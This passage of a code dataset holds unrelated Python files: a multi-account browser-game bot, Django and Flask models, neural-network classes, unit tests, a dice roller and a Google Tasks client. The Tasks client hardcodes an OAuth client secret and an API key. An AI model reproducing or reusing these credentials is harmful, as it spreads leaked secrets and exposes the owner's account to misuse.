1 — Microsoft\u200b Edge')[0]\r\nConta_2 = gw.getWindowsWithTitle('bombcrypto - Conta 2 — Microsoft\u200b Edge')[0]\r\nConta_3 = gw.getWindowsWithTitle('bombcrypto - Conta 3 — Microsoft\u200b Edge')[0]\r\nConta_4 = gw.getWindowsWithTitle('bombcrypto - Conta 4 — Microsoft\u200b Edge')[0]\r\nConta_5 = gw.getWindowsWithTitle('bombcrypto - Conta 5 — Microsoft\u200b Edge')[0]\r\n\r\ndef minimize_browser():\r\n    Pessoal.minimize()\r\n    Conta_1.minimize()\r\n    Conta_2.minimize()\r\n    Conta_3.minimize()\r\n    Conta_4.minimize()\r\n    Conta_5.minimize()\r\n\r\ndef max_browser():\r\n    Pessoal.restore()\r\n    Conta_1.restore()\r\n    Conta_2.restore()\r\n    Conta_3.restore()\r\n    Conta_4.restore()\r\n    Conta_5.restore()\r\n\r\nstarter = int(0)\r\ntime.sleep(1)\r\n\r\n\r\n#The code is called for two browsers, based on the \"name\" of the window. 
Change it if needed.\r\n#The script works based on images, so if your screen is different, take new screenshots for each image.\r\n\r\ndef f5():\r\n    #reload page to start the loop\r\n    #pyautogui.keyDown('ctrl') #un-comment this if you need hard-reset\r\n    pyautogui.keyDown('f5')\r\n    time.sleep(0.1)\r\n    #pyautogui.keyUp('ctrl')\r\n    pyautogui.keyUp('f5')\r\n    time.sleep(5) #increase this if your connection takes more than 7 sec to load the button\r\n\r\ndef routine(browser):\r\n    minimize_browser()\r\n    browser.maximize()\r\n    set_window.set_browser(browser)\r\n    time.sleep(0.7)\r\n    #Reload the page\r\n    f5()\r\n    automation.automation()\r\n    browser.restore()\r\n\r\ndef menu(browser):\r\n    minimize_browser()\r\n    browser.maximize()\r\n    set_window.set_browser(browser)\r\n    time.sleep(0.5)\r\n    automation.back_to_menu()\r\n    browser.restore()\r\n\r\n\r\ndef main():\r\n    while keyboard.is_pressed('q') == False and starter == 0:\r\n#minimize all browsers\r\n    \r\n\r\n        routine(Pessoal)\r\n        routine(Conta_1)\r\n        routine(Conta_2)\r\n        routine(Conta_3)\r\n        routine(Conta_4)\r\n        routine(Conta_5)\r\n        max_browser()\r\n\r\n        if error.error() == True:\r\n            #Try to find an error on the screen after completing the run; if one is found, run again\r\n            print(\"Error found on the screen, maybe because of the server. Running again in 5s\")\r\n            time.sleep(5)\r\n            main()\r\n        else:\r\n            print(\"No error was found, continuing.\")\r\n            #system to get to a new map\r\n            #Wait one hour to rerun and make everyone go to work again\r\n            for i in range(10):\r\n                #Search if the map is finished > change map\r\n                new_map.new_map()\r\n\r\n                #Search for errors\r\n                if error.error() == True:\r\n                    print(\"Found error on the screen, restarting the run\")\r\n                    main()\r\n                else:\r\n                    time.sleep(randint(240, 300))\r\n                    new_map.new_map()\r\n                    menu(Pessoal)\r\n                    new_map.new_map()\r\n                    menu(Conta_1)\r\n                    new_map.new_map()\r\n                    menu(Conta_2)\r\n                    new_map.new_map()\r\n                    menu(Conta_3)\r\n                    new_map.new_map()\r\n                    menu(Conta_4)\r\n                    new_map.new_map()\r\n                    menu(Conta_5)\r\n                    max_browser()\r\n    \r\n    main()\r\nmain()","repo_name":"Octhor/cryptobomb","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8473497795","text":"from django.urls import path\n\nfrom . 
import views\n\napp_name = \"students\"\n\nurlpatterns = [\n    path(\"\", views.StudentListView.as_view(), name=\"list\"),\n    path(\"<int:student_id>/\", views.student_card, name=\"student_card\"),\n    path(\"<int:student_id>/add_homework/\",\n         views.HomeworkCreateView.as_view(),\n         name=\"add_homework\"),\n    path(\"<int:student_id>/edit_homework/<int:pk>/\",\n         views.HomeworkUpdateView.as_view(),\n         name=\"edit_homework\"),\n    path(\"<int:student_id>/delete_homework/<int:pk>/\",\n         views.HomeworkDeleteView.as_view(),\n         name=\"delete_homework\"),\n    path(\"<int:student_id>/progress/\",\n         views.ProgressListView.as_view(),\n         name=\"progress\"),\n]\n","repo_name":"Rezenhorn/english_teacher","sub_path":"english/students/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"14599052635","text":"\"\"\"\nImplementation of ZFNet using Pytorch\n\"\"\"\nimport os\nimport torch\nimport torch.nn as nn\nimport matplotlib.pyplot as plt\n\n\nclass ZFNet(nn.Module):\n    def __init__(self):\n        super(ZFNet, self).__init__()\n        self.cnn_model = nn.Sequential(\n            nn.Conv2d(3, 96, kernel_size=7, stride=(4, 4)),\n            nn.ReLU(inplace=True),\n            nn.MaxPool2d(kernel_size=3, stride=2),\n            nn.Conv2d(96, 256, kernel_size=5, stride=(1, 1)),\n            nn.ReLU(inplace=True),\n            nn.MaxPool2d(kernel_size=3, stride=2),\n            nn.Conv2d(256, 512, kernel_size=3, stride=(1, 1)),\n            nn.ReLU(inplace=True),\n            nn.Conv2d(512, 1024, kernel_size=3, stride=(1, 1)),\n            nn.ReLU(inplace=True),\n            nn.Conv2d(1024, 512, kernel_size=3, stride=(1, 1)),\n            nn.ReLU(inplace=True),\n            nn.MaxPool2d(kernel_size=3, stride=2)\n        )\n        self.fc_model = nn.Sequential(\n            nn.Linear(2048, 4096),\n            nn.ReLU(inplace=True),\n            nn.Dropout(p=0.25, inplace=False),\n            nn.Linear(4096, 1024),\n            nn.ReLU(inplace=True),\n            nn.Dropout(p=0.25, inplace=False),\n            nn.Linear(1024, 10)\n        )\n        self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n        self.path = ''\n\n    def forward(self, x):\n        x = self.cnn_model(x)\n        x = x.view(x.size(0), -1)\n        x = self.fc_model(x)\n        return x\n","repo_name":"amrit-dev-20/Dev-Training-DL","sub_path":"Exercises/05_Deep_CNN_Architectures/Models/ZFNet/ZFNet.py","file_name":"ZFNet.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5906960632","text":"from app import db\n\nclass Metals(db.Model):\n    __tablename__ = 'metals'\n    date = db.Column(db.Date())\n    code = db.Column(db.Integer())\n    name = db.Column(db.String())\n    buy = db.Column(db.Float())\n    sell = db.Column(db.Float())\n\n    def __init__(self, date, code, name, buy, sell):\n        self.date = date\n        self.code = code\n        self.name = name\n        self.buy = buy\n        self.sell = sell\n\n    def __repr__(self):\n        return '<id {}>'.format(self.id)\n    \n    def serialize(self):\n        return {\n            'id': self.id, \n            'date': self.date,\n            'code': self.code,\n            'name':self.name,\n            'buy':self.buy,\n            'sell':self.sell\n        }","repo_name":"komissarov-andrew/web-app-be","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34059438170","text":"#! 
/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport gflags\nimport httplib2\n\nfrom apiclient.discovery import build\nfrom oauth2client.file import Storage\nfrom oauth2client.client import OAuth2WebServerFlow\nfrom oauth2client.tools import run\n\nclass GoTask:\n\n def __init__(self):\n \n FLAGS = gflags.FLAGS\n\n # Set up a Flow object to be used if we need to authenticate. This\n # sample uses OAuth 2.0, and we set up the OAuth2WebServerFlow with\n # the information it needs to authenticate. Note that it is called\n # the Web Server Flow, but it can also handle the flow for native\n # applications\n # The client_id and client_secret are copied from the API Access tab on\n # the Google APIs Console\n FLOW = OAuth2WebServerFlow(\n client_id='350392034727-p663o1j04sepb3ik4sp67u384o1jjee6.apps.googleusercontent.com',\n client_secret='o8V6_dLLJ-S5QKKxidE_Z0Yg',\n scope='https://www.googleapis.com/auth/tasks',\n user_agent='google-task-ui/v1')\n\n # To disable the local server feature, uncomment the following line:\n FLAGS.auth_local_webserver = False\n\n # If the Credentials don't exist or are invalid, run through the native client\n # flow. The Storage object will ensure that if successful the good\n # Credentials will get written back to a file.\n storage = Storage('tasks.dat')\n credentials = storage.get()\n if credentials is None or credentials.invalid == True:\n credentials = run(FLOW, storage)\n\n # Create an httplib2.Http object to handle our HTTP requests and authorize it\n # with our good Credentials.\n http = httplib2.Http()\n http = credentials.authorize(http)\n\n # Build a service object for interacting with the API. Visit\n # the Google APIs Console\n # to get a developerKey for your own application.\n self.service = build(serviceName='tasks', version='v1', \n http=http, developerKey='AIzaSyAwrNJT65OhdkwuxWEdh-ZUPP3kkPOk804')\n\n def list_tasklists(self):\n \"\"\"List an user's all tasklists\n\n \"\"\"\n response = self.service.tasklists().list().execute()\n return response['items']\n\n def rename_tasklist(self, tasklist, new_name):\n \"\"\"Rename the specified tasklist\n\n \"\"\"\n tasklist['title'] = new_name\n result = self.service.tasklists().update(tasklist=tasklist['id'], body=tasklist).execute()\n if result['title'] == new_name:\n return True\n else:\n return False\n\n def del_tasklist(self, tasklist_id):\n \"\"\"Delete the specified tasklist\n\n \"\"\"\n self.service.tasklists().delete(tasklist=tasklist_id).execute()\n \n def new_tasklist(self, tasklist_title):\n \"\"\"Create a new tasklist\n\n \"\"\"\n new_tasklist = {\n 'title': tasklist_title\n }\n result = self.service.tasklists().insert(body=new_tasklist).execute()\n return result['id']\n \n def list_tasks(self, tasklist_id):\n tasks = self.service.tasks().list(tasklist=tasklist_id).execute()\n if 'items' in tasks:\n return tasks['items']\n else:\n return []\n\n def new_task(self, tasklist_id, task):\n result = self.service.tasks().insert(tasklist=tasklist_id, body=task).execute()\n\n def del_task(self, tasklist_id, task_id):\n self.service.tasks().delete(tasklist=tasklist_id, task=task_id).execute()\n\n def complete_task(self, tasklist_id, task):\n task['status'] = 'completed'\n result = self.service.tasks().update(tasklist=tasklist_id, task=task['id'], body=task).execute()\n return result\n\n def uncomplete_task(self, tasklist_id, task):\n if task['status'] == 'completed':\n task['status'] = 'needsAction'\n task.pop('completed', None)\n result = self.service.tasks().update(tasklist=tasklist_id, task=task['id'], 
body=task).execute()\n            return result\n        else:\n            return task\n    \n    def move_task(self, tasklist_id, task_id_curr, task_id_pre=''):\n        self.service.tasks().move(tasklist=tasklist_id, task=task_id_curr, previous=task_id_pre).execute()\n    \n    def update_task(self, tasklist_id, task):\n        self.service.tasks().update(tasklist=tasklist_id, task=task['id'], body=task).execute()\n\n    def clear_task(self, tasklist_id):\n        self.service.tasks().clear(tasklist=tasklist_id).execute()\n","repo_name":"ks1024/google-task-ui","sub_path":"gtask-ui/gotask.py","file_name":"gotask.py","file_ext":"py","file_size_in_byte":4507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24773544545","text":"from random import randint\n\ndef roll(num, size):\n    \"\"\"Returns the cumulative total of num rolls of die size. A regular dnd\n    roll, and a location roll.\"\"\"\n\n    results = 0\n\n    for i in range(0, num):\n        results += randint(1, size)\n\n    return results\n\n\ndef roll_damage(num, size):\n    \"\"\"Returns the cumulative total of num rolls of die size with raises. A\n    damage roll.\"\"\"\n\n    results = 0 \n\n    for i in range(0, num):\n        r = roll(1, size)\n        while r == size:\n            results += r\n            r = roll(1, size)\n        results += r\n\n    return results\n\n\ndef roll_skill(num, size):\n    \"\"\"Returns the highest roll of num rolls of die size with raises and bust\n    checking. Bust will return 0. 
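(A bust occurs when at least half of the dice come up 1.) 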
A skill roll.\"\"\"\n\n results = []\n busts = 0\n result = 0\n\n for i in range(0, num):\n r = roll(1, size)\n if r == 1:\n busts += 1\n result = r\n elif r == size:\n while (r == size):\n result += r\n r = roll(1, size)\n else:\n result = r\n results.append(result)\n\n if busts >= num/2:\n return 0\n else:\n return max(results)\n\n\ndef roll_wind(num, size):\n \"\"\"Returns the highest roll of num rolls of die size with raises. A wind\n roll.\"\"\"\n\n results = []\n result = 0\n\n for i in range(0, num):\n r = roll(1, size)\n if r == size:\n while (r == size):\n result += r\n r = roll(1, size)\n else:\n result = r\n results.append(result)\n\n else:\n return max(results)\n","repo_name":"TwinHits/pydeadlands","sub_path":"dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29572015052","text":"from django.db import models\nfrom django.conf import settings\nfrom django.urls import reverse\nfrom django.utils import timezone\nfrom django.utils.text import slugify\n\n# pip install misaka\nimport misaka\n\nfrom club_accounts.models import Club_User\n#from user_accounts.models import User\n\nfrom django.contrib.auth import get_user_model\nUser = get_user_model()\n\n#choices for specifying event creator type\nevent_creator_type_choices =(\n (\"user\",\"Created by Student\"),\n (\"club_user\",\"Created by Club\")\n)\n\n#choices when user subscribes for an event\nevent_category_choices_prior = (\n (\"red\", \"Will be Going\"),\n (\"yellow\", \"Intrested\"),\n (\"green\", \"Not Going\")\n)\n\n#choices when an event starts\nevent_category_choices_posterior = (\n (\"white\", \"Attended\"),\n (\"black\", \"Did not Attend\"),\n (\"grey\", \"I Do not Know\")\n)\n\n\nclass Event(models.Model):\n \n event_name = models.CharField(max_length=255, unique=False)\n created_at = models.DateTimeField(auto_now=True)\n start_time = models.DateTimeField()\n end_time = models.DateTimeField() \n event_coordinator = models.ForeignKey(User, related_name=\"event_coordi\", on_delete=models.CASCADE)\n description = models.TextField()\n description_html = models.TextField(editable=False)\n\n #slug = models.SlugField(allow_unicode=True, unique=True) #used for making custom url with event name\n\n #event_creator_type = models.CharField(editable=False, choices=event_creator_type_choices)\n #event_club = models.ForeignKey(Club_User, editable= False, related_name=\"event_by_club\", on_delete=models.CASCADE, null=True, blank=True)\n \n #event_subcription_category = models.CharField(editable=False, choices=event_category_choices_prior, blank=True)\n #subscribed_event_attendance = models.CharField(editable=False, choices=event_category_choices_posterior, blank=True)\n\n #subscribers = models.ManyToManyField(User,through=\"Event_Subscriber\")\n\n\n def __str__(self):\n return self.event_name\n\n def save(self, *args, **kwargs):\n #self.slug = slugify(self.event_name)\n self.description_html = misaka.html(self.description)\n super().save(*args, **kwargs)\n\n def get_absolute_url(self):\n return reverse(\n \"events:single\", #detailed view of the event when opened by user to check details or subcribe\n kwargs={\n #\"username\": self.event_coordinator.username, #event_coordi username\n \"pk\": self.pk #primary key of event\n }\n )\n\n def is_past(self):\n if timezone.now() > self.end_time:\n return True\n return False\n\n\n\n class Meta:\n ordering = [\"-created_at\"]\n unique_together = [\"event_name\", 
\"event_coordinator\"]\n #below code to be used if working with \"event_club\" also as a relation\n #constraints = [\n # UniqueConstraint(fields=[\"event_name\", \"event_coordinator\", \"event_club\"],\n # name='unique_with_club_event'),\n # UniqueConstraint(fields=[\"event_name\", \"event_coordinator\"],\n # condition=Q(optional=None),\n # name='unique_without_club_event'),\n #]\n\n\n\n\n\n\"\"\"\nclass Event_Subscriber(models.Model):\n #created event_name to link to users --refrencing will be this when accesing Event_Member: event_name belong to Event table \n event_name = models.ForeignKey(Event,related_name='event_subcriptions',on_delete=models.CASCADE) \n \n #created users to link to event_name --refrencing will be this when accesing Event_Member: users belong User table \n users = models.ForeignKey(User,related_name='user_subscribed_events',on_delete=models.CASCADE)\n\n def __str__(self):\n return self.users.username\n\n class Meta:\n unique_together = (\"event_name\", \"users\") #set the link\n\"\"\"","repo_name":"B1-004/Atmanirbhar","sub_path":"atmanirbhar_main_app/events/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"1932313388","text":"import os\nfrom unittest import TestCase\n\nfrom hca_ingest.importer.submission.entity import Entity\nfrom hca_ingest.importer.submission.entity_map import EntityMap\nfrom tests.utils import load_json\n\n\nclass EntityMapTest(TestCase):\n def setUp(self) -> None:\n self.script_dir = os.path.dirname(__file__)\n self.json_dir = os.path.join(self.script_dir, 'spreadsheet_json')\n\n def test_load(self):\n # given:\n spreadsheet_json = load_json(f'{self.json_dir}/sample_spreadsheet.json')\n\n # when:\n entity_map = EntityMap.load(spreadsheet_json)\n\n # then:\n self.assertEqual(['project', 'biomaterial', 'file', 'protocol'],\n list(entity_map.get_entity_types()))\n\n # and:\n # TODO shouldn't entity id's be unique and that there's no need to specify entity type?\n biomaterial1 = entity_map.get_entity('biomaterial', 'biomaterial_id_1')\n self._assert_correct_entity(biomaterial1, entity_id='biomaterial_id_1',\n entity_type='biomaterial', content={'key': 'biomaterial_1'})\n\n # and:\n biomaterial2 = entity_map.get_entity('biomaterial', 'biomaterial_id_2')\n links = {'biomaterial': ['biomaterial_id_1'], 'process': ['process_id_1']}\n self._assert_correct_entity(biomaterial2, entity_id='biomaterial_id_2',\n entity_type='biomaterial', content={'key': 'biomaterial_2'},\n links=links)\n\n # and:\n protocol1 = entity_map.get_entity('protocol', 'protocol_id_1')\n self.assertEqual({'key': 'protocol_1'}, protocol1.content)\n\n def test_load__is_linking_reference(self):\n # given:\n spreadsheet_json = {\n 'biomaterial': {\n 'biomaterial_id': {\n 'content': {\n 'key': 'biomaterial_3'\n },\n 'links_by_entity': {\n 'biomaterial': ['biomaterial_id_2'],\n 'process': ['process_id_2']\n },\n 'external_links_by_entity': {\n 'biomaterial': ['biomaterial_uuid']\n },\n\n },\n }\n }\n\n # when:\n entity_map = EntityMap.load(spreadsheet_json)\n\n # then:\n self.assertEqual(['biomaterial'], list(entity_map.get_entity_types()))\n\n def test_load__is_reference(self):\n # given:\n spreadsheet_json = {\n 'biomaterial': {\n 'biomaterial_uuid': {\n 'content': {\n 'key': 'value'\n },\n 'is_reference': True\n }\n }\n }\n\n # when:\n entity_map = EntityMap.load(spreadsheet_json)\n\n # then:\n self.assertEqual(['biomaterial'], 
list(entity_map.get_entity_types()))\n\n def _assert_correct_entity(self, entity, entity_id='', content={}, entity_type='', links={}):\n self.assertTrue(entity)\n self.assertEqual(entity_id, entity.id)\n self.assertEqual(content, entity.content)\n self.assertEqual(entity_type, entity.type)\n self.assertEqual(links, entity.links_by_entity)\n\n def test_count_total(self):\n # given:\n zero_map = EntityMap()\n\n # and:\n one_map = EntityMap()\n one_map.add_entity(Entity('product', 'product_1', {}))\n\n # and:\n three_map = EntityMap()\n three_map.add_entity(Entity('profile', 'profile_1', {}))\n for product_id in range(0, 2):\n three_map.add_entity(Entity('product', f'product_{product_id}', {}))\n\n # expect:\n self.assertEqual(0, zero_map.count_total())\n self.assertEqual(1, one_map.count_total())\n self.assertEqual(3, three_map.count_total())\n\n def test_count_links(self):\n entity_map = EntityMap()\n\n # no element\n self.assertEqual(entity_map.count_links(), 0)\n\n # has 1 element without links\n entity_map.add_entity(Entity('product', 'product_0', {}))\n self.assertEqual(entity_map.count_links(), 0)\n\n # has 1 element with links\n entity_map.add_entity(Entity('product', 'product_1', {}, direct_links=[{}, {}, {}]))\n self.assertEqual(entity_map.count_links(), 3)\n\n # has many element with links\n entity_map.add_entity(Entity('product', 'product_2', {}, direct_links=[{}, {}, {}, {}]))\n self.assertEqual(entity_map.count_links(), 7)\n\n def test_get_project__returns_project(self):\n # given\n entity_map = EntityMap()\n project_entity = Entity('project', 'project_0', {})\n entity_map.add_entity(project_entity)\n\n # when\n output = entity_map.get_project()\n\n # then\n self.assertEqual(output, project_entity)\n\n def test_get_project__returns_none(self):\n # given\n entity_map = EntityMap()\n\n # when\n output = entity_map.get_project()\n\n # then\n self.assertEqual(output, None)\n\n def test_add_entity(self):\n # given\n entity_map = EntityMap()\n content = {'key': 'val'}\n entity = Entity(entity_type='protocol',\n entity_id='protocol-uuid',\n content=content,\n spreadsheet_location={})\n # when\n entity_map.add_entity(entity)\n\n # then\n saved_entity = entity_map.get_entity('protocol', 'protocol-uuid')\n self.assertFalse(saved_entity.is_reference)\n self.assertFalse(saved_entity.is_linking_reference)\n self.assertEqual(saved_entity.content, content)\n\n def test_add_entity__when_added_as_reference_entity_first__then_set_entity_as_linking_reference(self):\n # given\n entity_map = EntityMap()\n content = {'key': 'val'}\n entity = Entity(entity_type='protocol',\n entity_id='protocol-uuid',\n content=content,\n is_reference=True,\n spreadsheet_location={})\n entity_map.add_entity(entity)\n\n # when\n new_entity = Entity(entity_type='protocol',\n entity_id='protocol-uuid',\n content=content,\n is_linking_reference=True,\n spreadsheet_location={})\n entity_map.add_entity(new_entity)\n\n # then\n saved_entity = entity_map.get_entity('protocol', 'protocol-uuid')\n self.assertTrue(saved_entity.is_reference, 'The entity must be set as reference entity')\n self.assertTrue(saved_entity.is_linking_reference, 'The entity must be also set as a linking reference entity')\n self.assertEqual(saved_entity.content, content, 'The content must not be touched')\n\n def test_add_entity__when_added_as_linking_reference_entity_first__then_set_as_reference_and_copy_new_content(self):\n # given\n entity_map = EntityMap()\n content = {'key': 'val'}\n entity = Entity(entity_type='protocol',\n 
entity_id='protocol-uuid',\n                        content=content,\n                        is_linking_reference=True,\n                        spreadsheet_location={})\n        entity_map.add_entity(entity)\n\n        # when\n        new_content = {'key': 'val2'}\n        new_entity = Entity(entity_type='protocol',\n                            entity_id='protocol-uuid',\n                            content=new_content,\n                            is_reference=True,\n                            spreadsheet_location={})\n        entity_map.add_entity(new_entity)\n\n        # then\n        saved_entity = entity_map.get_entity('protocol', 'protocol-uuid')\n        self.assertTrue(saved_entity.is_linking_reference, 'The entity must be set as a linking reference entity')\n        self.assertTrue(saved_entity.is_reference, 'The entity must be set as reference entity')\n        self.assertEqual(saved_entity.content, new_content, 'The content must be updated')\n","repo_name":"ebi-ait/ingest-client","sub_path":"tests/unit/importer/submission/test_entity_map.py","file_name":"test_entity_map.py","file_ext":"py","file_size_in_byte":8101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22624958160","text":"import math as m\n\na = 0\nb = 1\n\ndef func(x):\n    return x * x * m.sin(x)\n\ndef simpson(a, b, n):\n    h = (b - a) / n\n    summ = func(a) + func(b)\n    even = 0\n    odd = 0\n    for i in range(1, n):\n        if i % 2 == 0:\n            even += func(a + i*h)\n        else:\n            odd += func(a + i*h)\n    summ += (2 * even + 4 * odd)\n    I = (h/3) * summ\n    return I\n\nprint(\"\"\"\nЧисленное интегрирование: метод Симпсона\nОпределенный интеграл x^2 * sinx, [0;1]\n\"\"\")\n\n\nn = 6\nprint(\"При n = 6:\")\nans = simpson(a, b, n)\nprint(\"Ответ: {}\".format(ans))\n\nn = 12\nprint(\"При n = 12:\")\nans = simpson(a, b, n)\nprint(\"Ответ: {}\".format(ans))\n\nn = 60\nprint(\"При n = 60:\")\nans = simpson(a, b, n)\nprint(\"Ответ: {}\".format(ans))\n\nn = 600\nprint(\"При n = 600:\")\nans = simpson(a, b, n)\nprint(\"Ответ: {}\".format(ans))\n","repo_name":"keshapou/labs","sub_path":"numerical_methods/Integrals/simpson.py","file_name":"simpson.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14379344285","text":"#python statements\n#assignment statements\n#conditional statements: if/elif/else\n# a =int(input(\"请输入你的年龄:\"))\n# if a > 18:\n#     print(\"成年了\")\n# elif a > 10:    #runs when a <= 18 and a > 10 (i.e. 10 to 18)\n#     print(\"未成年\")\n# elif a > 5:\n#     print(\"奶娃娃\")\n# else:\n#     print(\"花一样得年纪\")\n\n\n\n#if the if condition holds, its print runs; if not, the next elif below is checked\n\n\n\n\n#demonstrating if/else\na = 9\nb = 9\nif a < 10:\n    print(\"大于十\")\n    if b < 5:\n        print(\"大儿子\")\n    else:\n        if b > 10:\n            print(\"等待\")\n        else:\n            print(\"小于大大\")\nelse:\n    print(\"大大大\")\n\n\n#conditions usable in an if\n# > : numeric comparison; a > b holds when a is greater than b\n# < : numeric comparison\n# >= : numeric comparison\n# <= : numeric comparison\n# == : whether two values are equal, int/str/tuple/list/dict\n# != : whether two values differ, int/str/tuple/list/dict\n# in : tests whether one value is contained in another\n# not in : tests whether one value is not contained in another\n# is :\n# is not :\n\n#using in and not in\na = \"大\"\nb = \"大蟒蛇\"\nif a in b :\n    print(\"好大一个蟒蛇\")\n\nelse:\n    print(\"好小一个蟒蛇\")\n\n\na = \"大\"\nb = \"大蟒蛇\"\nif a not in b :\n    print(\"好大一个蟒蛇\")\n\nelse:\n    print(\"好小一个蟒蛇\")\n\n\n\n#using is and is not\nif \"好大\" is True: #identity of type and value; 0 is falsy, 1 is truthy\n    print(\"顶顶顶顶\")\nelse:\n    print(\"卡布角落\")\n\n\nif \"好大\" is not True: #identity of type and value\n    print(\"顶顶顶顶\")\nelse:\n    print(\"卡布角落\")\n\n\n# loop statements: for/while\n#iterating over strings, lists, tuples, dicts:\nz = \"只是来之上海的10K工资\"\nfor i in z:   #take each value\n    print(i)\nb = [\"4\",\"5\",\"6\",\"5\",\"大大大大大大大\"] \nm = (\"4\",\"5\",\"6\",\"5\",\"大大大大大大大\")\nfor i in b:\n    print(i)\n\n\n#iterating over a dict\na = {\"字典\":\"大字典\",\"小指点\":\"ddd\"}\nfor v in a:\n    print(v,a[v])   #a[\"字典\"]: v=\"字典\" -> a[v] \n\n\n#range: sequence generator, quickly produces a run of numbers\nrange(10)   #[0123456789]\n\nfor jj in range(10):\n    
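# prints 0 through 9, one per line\n    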
print(jj)\n\n\n#range(start, stop, step) runs up to stop, excluding stop itself\n\n\nfor jj in range(2,11,2): #yields 2 4 6 8 10: the first number is the starting value, the middle 11 is the exclusive stop, and the final 2 is the step between values \n    print(jj)\n","repo_name":"Gratuler/zhushi","sub_path":"demo03.py","file_name":"demo03.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"5914753480","text":"import tensorflow as tf\n\n##\nfrom constant.constant import EMBEDDING_SIZE\n\n\nclass NN:\n    def __init__(self):\n        # parameter settings\n        self.training_batch_size = 128\n        self.valid_batch_size = 256\n        self.iteration = 100000\n        # embedding size\n        self.input_size = EMBEDDING_SIZE\n        # accu_size = 203\n        self._output_size = 4\n        # number of labels returned for multi-label prediction\n        self.multi_label_count = 3\n        # computation graph\n        self._graph = tf.Graph()\n\n        # build the model-related tensors\n        self._x, self._y, self._keep_prob = self.build_placeholder()\n        self.row_prediction = self.build_model()\n        # the code below is for single-label classification\n        self.loss = self.build_one_lebal_loss()\n        self._train_op = self.build_train_op()\n        self.result = self.get_one_result()\n        self.accuracy = self.one_result_accuracy()\n        # the code below is for multi-label classification\n        # self.loss = self.build_muti_lebal_loss()\n        # self._train_op = self.build_train_op()\n        # self._result_value, self._result_index = self.get_multi_result()\n\n    # helper that adds one neural-network layer\n    def _add_layer(self, layerName, inputs, in_size, out_size, activation_function=None):\n        # add one more layer and return the output of this layer\n        with tf.variable_scope(layerName, reuse=None):\n            Weights = tf.get_variable(\"weights\", shape=[in_size, out_size],\n                                      initializer=tf.truncated_normal_initializer(stddev=0.1))\n            biases = tf.get_variable(\"biases\", shape=[1, out_size],\n                                     initializer=tf.truncated_normal_initializer(stddev=0.1))\n\n            Wx_plus_b = tf.matmul(inputs, Weights) + biases\n            tf.add_to_collection(tf.GraphKeys.WEIGHTS, Weights)\n            if activation_function is None:\n                outputs = Wx_plus_b\n            else:\n                outputs = activation_function(Wx_plus_b)\n            return outputs\n\n    # return the placeholders that must be fed at training time\n    def build_placeholder(self):\n        with self._graph.as_default():\n            x = tf.placeholder(tf.float32, [None, self.input_size])\n            y = tf.placeholder(tf.float32, [None, self.output_size])\n            # dropout reduces overfitting by rescaling the previous layer's inputs: some weights are scaled down (even to 0) and others scaled up (even to 2), damping oscillation in the evaluation curve; especially useful when samples are few\n            # a placeholder lets dropout determine the scale automatically; it can also be set manually, e.g. 0.5 - per the tensorflow docs the value actually applied is 1/0.5=2, i.e. some inputs are multiplied by 2 while others are zeroed\n            keep_prob = tf.placeholder(tf.float32)\n\n            return x, y, keep_prob\n\n    # build the model\n    # returns the output tensor, with shape batch_size * output_size\n    def build_model(self):\n        with self._graph.as_default():\n            # add hidden layer 1\n            l1 = self._add_layer(\"layer1\", self.x, self.input_size, 64, activation_function=tf.sigmoid)\n            # add hidden layer 2\n            l2 = self._add_layer(\"layer2\", l1, 64, 128, activation_function=tf.sigmoid)\n            l2_drop = tf.nn.dropout(l2, self._keep_prob)\n            # add the output layer\n            prediction = self._add_layer(\"layer3\", l2_drop, 128, self.output_size, activation_function=tf.identity)\n\n            return prediction\n\n    # build the loss for single-label prediction\n    def build_one_lebal_loss(self):\n        with self.graph.as_default():\n            cross_entropy = tf.reduce_sum(\n                tf.nn.softmax_cross_entropy_with_logits(labels=self.y, logits=self.row_prediction))\n            reg_term = self._build_regular_term()\n            loss = cross_entropy + reg_term\n\n            return loss\n\n    def _build_regular_term(self):\n        with self.graph.as_default():\n            regularizer = tf.contrib.layers.l2_regularizer(scale=0.001)\n            reg_term = tf.contrib.layers.apply_regularization(regularizer)\n            return reg_term\n\n    # build the loss for multi-label prediction\n    def build_muti_lebal_loss(self):\n        with self.graph.as_default():\n            cross_entropy = 
